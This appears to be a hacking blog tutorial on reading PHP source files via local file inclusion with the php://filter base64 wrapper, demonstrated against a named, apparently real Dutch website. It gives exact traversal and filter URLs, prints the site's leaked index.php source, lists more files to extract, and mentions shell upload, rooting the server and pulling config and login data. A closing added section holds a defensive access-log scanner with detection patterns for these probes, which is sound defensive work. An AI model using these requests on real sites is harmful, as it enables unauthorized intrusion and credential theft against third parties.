Read PHP files using LFI (Base 64 Bypass)

Hello,

Ever thought you could read PHP files using Local File Inclusion? Let me explain; I will show how I bypassed the LFI restrictions. In this tutorial I am going to use a URL to show you how this works and how to get around the open_basedir restriction, etc. It doesn't always work, but if you get the encoding exactly right it will.

Example of a base64-encoded file read:
(php://filter/convert.base64-encode/resource=index.php&top=Home)
Let me show you a PoC:
Target URL
——————————————-
http://mistflard.nl/index.php?page=home.php (200)ok
URL THAT TRIGGERED ERROR
——————————
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
ERROR
———-

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in
/home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream:
Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in
effect. File(/etc/passwd) is not within the allowed path(s):
(/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129

Now, let's see what we can do here.
1) http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
2) Base64-encoded response
——————————————————
<?php 
require "prepend.php"; 
$login=$_GET['login'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta  name = "viewport" content = "width=1024" />
<link href="stijl.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]-->
<link rel="shortcut icon" href="/favicon.ico" />
<title>mistflard</title>
<script type="text/javascript" src="md5.js"></script>
<script language="javascript">
function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value 
  //document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";
<?php $para=microtime(1)*1000; ?>
buff=wacht1+<?php echo $para; ?>; 
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=<?php echo $para; ?>;
document.hform.submit();
}
</script>
</head>
<body>
<div id="Main">
<div id="Hoofd">
<div id="login">
<?php
if ($_SESSION['user']==null)
{
if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>"; else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>";
if ($login!=1)
{
include "controle.php";
echo "<table><tr>";
echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>";
echo "<tr><form action='login.php' method='post'>";
echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>";
echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='hidden' name='code' value=$para ></td>";
echo "<td><input type='submit' name='submitButton' value='login' class='knop1'/></td>";
echo "</form> ";
} else
{
echo '<form name="login">';
echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>';
echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo '<td><input onClick="passResponse(); return false;" type="submit" name="submitbtn" value="Login veilig"  class="knop2"></td>';
echo '</form>';
echo '<form action="loginveilig.php" METHOD="POST" name="hform">';
echo '<input type="hidden" name="user">';
echo '<input type="hidden" name="password">';
echo '<input type="hidden" name="code">';
echo '</form>';
}
} else
{
echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>";
$user=$_SESSION['user'];
echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>";
echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>";
echo "</form></td>";   //(<a href="loguit.php">Loguit</a>)
 
}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>";
echo "<td><input type='submit' name='submitButton' value='inschrijven' class='knop2'/>";
echo "</td></form>";
echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>";
echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>";
echo "</td></form>";
} else if ($login!=1)
{
echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>"; echo"<td style='width:128px'></td>";
echo "<td><input type='submit' name='submitButton' value='uitschrijven' class='knop2'/>";
echo "<input type='hidden' name='usernaam' value=\"$user\">";
echo "</td></form>";
 if ($user=='admin')
 {
 echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>";
 echo "<td><input type='submit' name='substelin' value='In.' class='knop0' title='Instellingen'/>";
 echo "</td></form>";
 }
 
} echo "</tr></table></div>"; // einde login
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6='';
if (isset($_GET['page']))
    $page = $_GET['page'];
else $page = "inleiding.php"; 
if ($page=="inleiding.php")   {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php")        {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
</div> <!--einde Hoofd-->
<div class="menu">
 <div class="hovermenu">
 <ul>
 <li id="<?php echo $vorm1; ?>"><a href="index.php?page=inleiding.php" title="Inleiding"><span>Inleiding</span></a></li>
 <li id="<?php echo $vorm2; ?>"><a href="index.php?page=home.php" title="Forum"><span>Forum</span></a></li>
 <li id="<?php echo $vorm3; ?>"><a href="index.php?page=toelichting.php" title=""><span>Toelichting</span></a></li>
 <li id="<?php echo $vorm4; ?>"><a href="index.php?page=forumregels.php" title=""><span>Forum regels</span></a></li>
 <li id="<?php echo $vorm5; ?>"><a href="index.php?page=contact.php" title=""><span>Contact</span></a></li>
 </ul>
</div>
</div>
<div class="balk"><!-- voor IE 6 --></div>
<?php
if (isset($_GET['page']))
    $page = $_GET['page'];
else $page = "inleiding.php"; 
?>
<?php
echo"<div id='Content'>";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page; 
echo "</div>"; /*einde content */
?>
<div id="Voet">
<?php
setlocale(LC_TIME,'nl_NL','nl','du');
echo "<div style='margin-left:600px;margin-top:10px;'>".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'</div>';
?>
</div>
</div> <!--einde main-->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}
</script>

</body>
</html>
—————————————————————————————————
3) DECODED RESPONSE
—————————————————————————————————
4.) Now we move on to see if we can root the box or at least get a shell uploaded. They have the open_basedir restriction in effect, so I highly doubt we can upload a shell via /proc/self/environ, but we can try it.
5.) So I grab prepend.php and decode its contents as well, using Opinionated Geek's online base64 decoder, and got the following:
(screenshot: response after decode)
Writing out the other responses would be too long for the blog. You can get the base64-encoded source of any PHP page of the website in the same way:
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/login/versio.inc.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/vergeten.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/meldaan.php
6.) Now that you can read any of the files, let's try the config. That wasn't easy, but you can also extract the configuration.php / config.php file this way.
———————————
login info
———————————-

And to top it off, they block access to the MySQL server from outside, so what are we to do? So this is how I bypass LFI where a direct query is blocked.
Thank you. 🙂
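On the defender's side, the requests used in this post leave distinctive traces in the web server's access log. The following is an added example (not from the post) of a small scanner run over constructed combined-format log lines that carry the same wrapper and traversal patterns, including a percent-encoded variant.

```php
<?php
// Added example, not from the post: a small scanner that flags access-log
// entries carrying the request patterns shown above (php://filter wrapper
// reads, ../ traversal, probes for /etc/passwd or /proc/self/environ).
// The log lines below are constructed for this example.
declare(strict_types=1);
$sampleLog = <<<'LOG'
203.0.113.7 - - [10/Oct/2012:13:55:36 +0200] "GET /index.php?page=home.php HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2012:13:55:41 +0200] "GET /index.php?page=../../../../../../../../etc/passwd HTTP/1.1" 200 812
203.0.113.7 - - [10/Oct/2012:13:56:02 +0200] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9944
203.0.113.7 - - [10/Oct/2012:13:57:10 +0200] "GET /index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dprepend.php HTTP/1.1" 200 2210
198.51.100.4 - - [10/Oct/2012:14:01:00 +0200] "GET /index.php?page=contact.php HTTP/1.1" 200 4311
LOG;
// Indicators found in one request URI. The URI is URL-decoded repeatedly
// (bounded) so that percent-encoding the wrapper does not hide it.
function lfiIndicators(string $uri): array
{
    $decoded = $uri;
    for ($i = 0; $i < 3 && ($next = rawurldecode($decoded)) !== $decoded; $i++) {
        $decoded = $next;
    }
    $found = [];
    if (preg_match('#[?&=][a-z][a-z0-9.+-]*://#i', $decoded))          $found[] = 'stream-wrapper';
    if (stripos($decoded, 'php://filter') !== false)                   $found[] = 'php-filter';
    if (stripos($decoded, 'convert.base64-encode') !== false)          $found[] = 'base64-filter';
    if (preg_match('#\.\.[/\\\\]#', $decoded))                         $found[] = 'traversal';
    if (preg_match('#/etc/passwd|/proc/self/environ#i', $decoded))     $found[] = 'sensitive-path';
    return $found;
}

// Parse combined-format lines and keep only those with at least one indicator.
function scanLog(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $indicators = lfiIndicators($m[3]);
        if ($indicators !== []) {
            $hits[] = ['ip' => $m[1], 'time' => $m[2], 'uri' => $m[3], 'indicators' => $indicators];
        }
    }
    return $hits;
}

foreach (scanLog($sampleLog) as $hit) {
    printf("%s %s %s [%s]\n", $hit['time'], $hit['ip'], $hit['uri'], implode(',', $hit['indicators']));
}
```

Of the five constructed lines, the two plain page loads are ignored and the three probes are reported with their indicator tags, so the same function can be dropped into a log-tailing job or a WAF rule test.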
